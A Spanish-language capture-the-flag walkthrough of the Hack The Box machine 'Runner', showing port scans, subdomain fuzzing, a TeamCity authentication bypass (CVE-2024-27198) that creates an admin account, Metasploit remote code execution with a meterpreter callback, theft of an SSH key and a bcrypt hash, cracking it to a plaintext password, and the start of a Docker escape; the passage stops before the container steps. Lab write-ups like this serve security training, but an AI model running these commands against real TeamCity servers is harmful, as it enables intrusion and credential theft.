Runner
OS: Linux
Dificultad: Medio
Puntos: 30
Nmap
ports=$(nmap -p- --min-rate=5000 -T4 10.129.238.77 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -vvv -p $ports -sC -sV -oN nmap.txt 10.129.238.77
Nmap scan report for 10.129.238.77
Host is up, received reset ttl 63 (0.13s latency).
Scanned at 2024-04-23 02:46:41 EDT for 11s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJ+m7rYl1vRtnm789pH3IRhxI4CNCANVj+N5kovboNzcw9vHsBwvPX3KYA3cxGbKiA0VqbKRpOHnpsMuHEXEVJc=
| 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOtuEdoYxTohG80Bo6YCqSzUY9+qbnAFnhsk4yAZNqhM
80/tcp open http syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://runner.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
8000/tcp open nagios-nsca syn-ack ttl 63 Nagios NSCA
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Enumeration
Enumeramos subdominios y encontramos el siguiente.
ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -H "Host: FUZZ.runner.htb" -u http://runner.htb -fw 4
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://runner.htb
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
:: Header : Host: FUZZ.runner.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response words: 4
________________________________________________
teamcity [Status: 401, Size: 66, Words: 8, Lines: 2, Duration: 490ms]
Podemos ver que se muestra la aplicacion teamcity y su version.
TeamCity Auth Bypass (CVE-2024-27198)
Investigando vulnerabilidades de esa version nos percatamos que es posible crearnos una cuenta usando el siguiente script para acceder a la aplicacion.
python3 CVE-2024-27198.py -t http://teamcity.runner.htb -u doom -p doom
[+] Version Found: 2023.05.3 (build 129390)
[+] Server vulnerable, returning HTTP 200
[+] New user doom created succesfully! Go to http://teamcity.runner.htb/login.html to login with your new credentials :)
Tambien es posible obtener RCE con esta misma vulnerabilidad.
msfconsole
use exploit/multi/http/jetbrains_teamcity_rce_cve_2024_27198
set rhosts teamcity.runner.htb
set rport 80
set lhost tun0
run
SSH Keys
Podemos encontrar una llave privada rsa en los proyectos.
cat data/teamcity_server/datadir/config/projects/AllProjects/pluginData/ssh_keys
Tambien es posible obtenerla desde la pagina web.
Esa llave la podemos usar para conectarnos por SSH con el usuario john.
chmod 400 id_rsa
ssh -i id_rsa john@10.129.238.77
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-102-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
john@runner:~$ id
uid=1001(john) gid=1001(john) groups=1001(john)
Lateral Movement
Revisando los archivos de teamcity desde la primera shell obtenemos el hash del usuario matthew.
meterpreter > download /data/teamcity_server/datadir/system/buildserver.data
[*] Downloading: /data/teamcity_server/datadir/system/buildserver.data -> /root/htb/Box/Runner/buildserver.data
[*] Downloaded 512.00 KiB of 512.00 KiB (100.0%): /data/teamcity_server/datadir/system/buildserver.data -> /root/htb/Box/Runner/buildserver.data
[*] Completed : /data/teamcity_server/datadir/system/buildserver.data -> /root/htb/Box/Runner/buildserver.data
strings buildserver.data | grep -A 5 matthew
matthew
<$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/YPHbD48/JQsdGLulmeVo.Em
Matthew
matthew@runner.htb
BCRYPT
hasSeenExperimentalOverview
Cack hash
Usamos john para obtener el password.
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 128 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
piper123 (?)
1g 0:00:01:21 DONE (2024-04-23 04:48) 0.01221g/s 635.7p/s 635.7c/s 635.7C/s playboy93..onelife
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Privilege Escalation
En el archivo hosts encontramos un nuevo subdominio.
john@runner:~$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 runner runner.htb teamcity.runner.htb portainer-administration.runner.htb
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
Lo agregamos a nuestro archivo hosts y accedemos a un portal web.
Con las credenciales de matthew podemos autenticarnos.
matthew : piper123
Despues de investigar e intentar varias cosas llegamos a este articulo que explica como podemos explotar una vulnerabilidad de docker para salir del sandbox.
Primero crearemos un contenedor con las siguientes caracteristicas.
Desplegamos el contenedor y ahora podemos acceder a la consola.